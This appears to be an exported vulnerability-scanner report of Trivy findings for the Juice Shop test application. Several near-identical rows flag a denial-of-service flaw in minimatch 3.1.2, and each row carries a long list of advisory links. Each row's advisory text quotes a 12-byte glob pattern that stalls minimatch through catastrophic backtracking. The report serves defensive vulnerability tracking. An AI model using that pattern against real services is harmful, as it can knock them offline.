NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.297487+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.301466+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,154,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.301528+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.301477+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.305877+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/file-js/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,155,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.305932+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.305885+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.309919+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/fstream/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,156,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.309996+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.309929+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.314200+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,157,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.314254+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.314208+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.317794+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,158,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.317872+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.317808+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.322132+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/rimraf/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,159,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.322189+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.322141+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.326301+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,160,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.326354+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.326309+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.330001+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,161,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.330054+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE 